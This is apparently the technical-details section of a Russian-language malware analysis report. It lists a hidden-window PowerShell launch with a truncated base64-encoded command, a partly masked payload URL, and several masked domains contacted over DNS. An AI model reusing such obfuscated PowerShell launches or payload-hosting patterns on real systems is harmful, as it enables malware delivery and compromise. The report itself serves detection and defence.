Техническая информация
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABZAHAAbAB3AG0AbgBrAHcAbwA9ACcAVQBnAHIAcQB2AGgAZABsAGUAYgBqAGcAdQAnADsAJABXAHUAeAB0AGMAeQBvAGUAcQBtAHAAaQBpACAAPQAgACcANwAzADcAJwA7ACQAQgBsAHYAaABrAHgAZQBkAHMAdAA9ACcASgBsAHgAagBsAGQAZAB...
- http://www.xb##fy.info/wp-admin/v8k9/
- DNS ASK pl######rnitureinterior.com
- DNS ASK mo###trade.com
- DNS ASK bl####o.10web.site
- DNS ASK xb##fy.info
- DNS ASK nh####hngoaingu.net
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABZAHAAbAB3AG0AbgBrAHcAbwA9ACcAVQBnAHIAcQB2AGgAZABsAGUAYgBqAGcAdQAnADsAJABXAHUAeAB0AGMAeQBvAGUAcQBtAHAAaQBpACAAPQAgACcANwAzADcAJwA7ACQAQgBsAHYAaABrAHgAZQBkAHMAdAA9ACcASgBsAHgAagBsAGQAZAB...' (со скрытым окном)